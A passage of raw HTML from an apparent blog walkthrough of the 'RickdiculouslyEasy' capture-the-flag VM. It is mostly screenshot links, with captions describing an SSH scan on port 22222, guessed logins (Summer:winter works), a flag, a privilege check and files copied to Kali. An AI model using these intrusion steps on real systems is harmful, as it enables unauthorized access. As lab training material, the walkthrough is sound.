src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg7MQhiOzf6_kXYO0Tfi7yi8sSF1KJ_Fmjfw3-y4BTkhfzELU6GAOod8BxbR25KmY5syUfecf73vwKllQiP8ixCHfJDUHMn-Vr0DZeKMhbT5i8ns09FJh18i7iTI9k3kRlFciLGmnqOLy3-/s16000/screenshot.35.jpg&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiQh31eC1gHJ5t4JbrUCGLhXskMGN7NDMoM67qBT1fJzIZUMYCL9Mtwnk6IKFjg6Jw1gUorG-3umBeQb8KliXL6B8EFZFVqSO35HtVEyqHyxCe4xNsHGa1wTNysowhH0H5AiB6KIUUannZy/&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;272&quot; data-original-width=&quot;555&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiQh31eC1gHJ5t4JbrUCGLhXskMGN7NDMoM67qBT1fJzIZUMYCL9Mtwnk6IKFjg6Jw1gUorG-3umBeQb8KliXL6B8EFZFVqSO35HtVEyqHyxCe4xNsHGa1wTNysowhH0H5AiB6KIUUannZy/s16000/screenshot.36.jpg&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;/div&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiRlkV-HxsNQTka69E7gG-NjE5KTLTbmXW-s1TuNtHss8rWEkiaQcwT7baI4Layq_mBuROmbXG_zEiUC_I-Bu3NojBKlBd7YFHecmFEe7aDYRpwgJgNF1EXRMPtIzwo8ixmD9CbLM31SfT_/&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;901&quot; data-original-width=&quot;792&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiRlkV-HxsNQTka69E7gG-NjE5KTLTbmXW-s1TuNtHss8rWEkiaQcwT7baI4Layq_mBuROmbXG_zEiUC_I-Bu3NojBKlBd7YFHecmFEe7aDYRpwgJgNF1EXRMPtIzwo8ixmD9CbLM31SfT_/s16000/screenshot.39.jpg&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Scanning port 22222, it&amp;nbsp; is a SSH server:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj4eDMjMN-rkk-aONRiNwD_RQrfv4pUk7Yqz4q_bj6HNguCnuq0DP-hEzL0_iLFcRbP7KGYWqnvUTWwrvL_dZi64-IGJ52_hP-jYRy6mR8eLObp429JAVEHXeuSx_9COG9YJpFD25fNZJLX/&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;256&quot; data-original-width=&quot;726&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj4eDMjMN-rkk-aONRiNwD_RQrfv4pUk7Yqz4q_bj6HNguCnuq0DP-hEzL0_iLFcRbP7KGYWqnvUTWwrvL_dZi64-IGJ52_hP-jYRy6mR8eLObp429JAVEHXeuSx_9COG9YJpFD25fNZJLX/s16000/screenshot.37.jpg&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Trying credentials&lt;b&gt; morty:winter&lt;/b&gt; access is denied:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhmhdgjVJyNYmiIamecll2yJ7-Omj6_SQ94Gmus0Mmkk1GPnPD7E7nJXlF3gnYvidbBN4sAxRkTQ748xoxDl6noQiI2YTBMgcxareazGZxh062dx7Em8D_mBkwgwT-fH05EmirpGfZSZ_LJ/&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;73&quot; data-original-width=&quot;622&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhmhdgjVJyNYmiIamecll2yJ7-Omj6_SQ94Gmus0Mmkk1GPnPD7E7nJXlF3gnYvidbBN4sAxRkTQ748xoxDl6noQiI2YTBMgcxareazGZxh062dx7Em8D_mBkwgwT-fH05EmirpGfZSZ_LJ/s16000/screenshot.38.jpg&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Trying credentials &lt;b&gt;Summer:winter&lt;/b&gt; it works:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh61mqi-v4zmnzQLSpNFpaLxdc2lLL4JJHf_676ow9LJD_wOfy16tkrIxg3g4rlJWDhLT-88-eiSLh0zWQgxo4gupt0UX-skoNu-JZm_ctHsaeqRmxYYTAxUb8OnQKIpHNy-sY_27-oiFNP/&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;119&quot; data-original-width=&quot;674&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh61mqi-v4zmnzQLSpNFpaLxdc2lLL4JJHf_676ow9LJD_wOfy16tkrIxg3g4rlJWDhLT-88-eiSLh0zWQgxo4gupt0UX-skoNu-JZm_ctHsaeqRmxYYTAxUb8OnQKIpHNy-sY_27-oiFNP/s16000/screenshot.40.jpg&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Another 10 points &lt;b&gt;FLAG (60/130)&lt;/b&gt; is available:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiVLVTh_FdMQEDV9W3bTHVVsxgjUuK-4GcSof8aNIv62RZntg71F50zdsTz1miv5FTyj8rJc_sfPFZpT9MKQlw68QmtvVgy_LsAHnPNK9khvKMy3MfEn2Cv832hOfka7H-afZFcL72d-QBk/&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;210&quot; data-original-width=&quot;654&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiVLVTh_FdMQEDV9W3bTHVVsxgjUuK-4GcSof8aNIv62RZntg71F50zdsTz1miv5FTyj8rJc_sfPFZpT9MKQlw68QmtvVgy_LsAHnPNK9khvKMy3MfEn2Cv832hOfka7H-afZFcL72d-QBk/s16000/screenshot.41.jpg&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh9HS9UW4GH7aIcmXJwlGFLHlu1QfvUiFEYESXujd9Xwk3p5mChG4-YeqAeHKuI3W_WmLQb0Gtb3jRv6Oeh_bPaLl9bTTCxhp7RgYJTMaHid_-H-Hnx-2vFJ4eMXyuhxJjXDFP2SDXbdZKt/&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;415&quot; data-original-width=&quot;576&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh9HS9UW4GH7aIcmXJwlGFLHlu1QfvUiFEYESXujd9Xwk3p5mChG4-YeqAeHKuI3W_WmLQb0Gtb3jRv6Oeh_bPaLl9bTTCxhp7RgYJTMaHid_-H-Hnx-2vFJ4eMXyuhxJjXDFP2SDXbdZKt/s16000/screenshot.89.jpg&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Unfortunately user &lt;b&gt;Summer&lt;/b&gt; does not have sudoer privileges:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhK8gD0TdPKWk_EY_ec0YMIYJ_rlwkATwnrAHQb0PjDYg51yfjGt-OJwVT5WRsgtlvTOSqRoO2_3SChs956RoQcRgELojB6dvjpESjon5xd_hHiQfUpX-uS7XW4BMHmAvzWjhaox1pVDbDi/&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;255&quot; data-original-width=&quot;730&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhK8gD0TdPKWk_EY_ec0YMIYJ_rlwkATwnrAHQb0PjDYg51yfjGt-OJwVT5WRsgtlvTOSqRoO2_3SChs956RoQcRgELojB6dvjpESjon5xd_hHiQfUpX-uS7XW4BMHmAvzWjhaox1pVDbDi/s16000/screenshot.43.jpg&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Looking for files into &lt;b&gt;/home&lt;/b&gt;:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjnBCVoYqEBa9eZHbE-QktN-M5z3qRoUGNfAy86Cyx_7JHsWFwtvls-0HBHXxi4GsYlOvOK75b5IUzLKl5NBBYLkHX-7kvfIH13Ds2-ydmxsx36X-FN3KkADW4f5ftm0dM1raIIo0YTgOVS/&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;70&quot; data-original-width=&quot;325&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjnBCVoYqEBa9eZHbE-QktN-M5z3qRoUGNfAy86Cyx_7JHsWFwtvls-0HBHXxi4GsYlOvOK75b5IUzLKl5NBBYLkHX-7kvfIH13Ds2-ydmxsx36X-FN3KkADW4f5ftm0dM1raIIo0YTgOVS/s16000/screenshot.44.jpg&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- &lt;b&gt;Morty&lt;/b&gt; has interesting files inside his home folder:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiuCO5XuBDXwq34nrIw5tSX_RaG5JeIsLwlm0jhR2BmaO-lLuejbUiVovkAUB8wwWb8LeScZp8T86k0L3lSNYnCPuPiYMeNuCSzq6qrucBwm0TUG2a5n7wJXAit2_kI4hvDtVoEbI4qhDdo/&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;254&quot; data-original-width=&quot;702&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiuCO5XuBDXwq34nrIw5tSX_RaG5JeIsLwlm0jhR2BmaO-lLuejbUiVovkAUB8wwWb8LeScZp8T86k0L3lSNYnCPuPiYMeNuCSzq6qrucBwm0TUG2a5n7wJXAit2_kI4hvDtVoEbI4qhDdo/s16000/screenshot.45.jpg&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;-Transferring &lt;b&gt;Safe_Password.jpg&lt;/b&gt; and &lt;b&gt;journal.txt.zip&lt;/b&gt; from&amp;nbsp;&lt;b&gt;RickdiculouslyEasy&amp;nbsp;&lt;/b&gt;to Kali:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhEtaF0uAIvn6APHhs2SUvohx0mPn7k7_FqdnGBA1Q920sEtUWdSKDQj55Z5DHkHvrbqfoEiFWdmTvBrKo43JzupYG-P89LA8_CDyawUT_sRHvLva3NDAr4uX-4eotW_tj2A9UhW6ayFlcA/&quot; style=&quot;clear: left; display: inline; margin-bottom: 1em; margin-right: 1em; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img 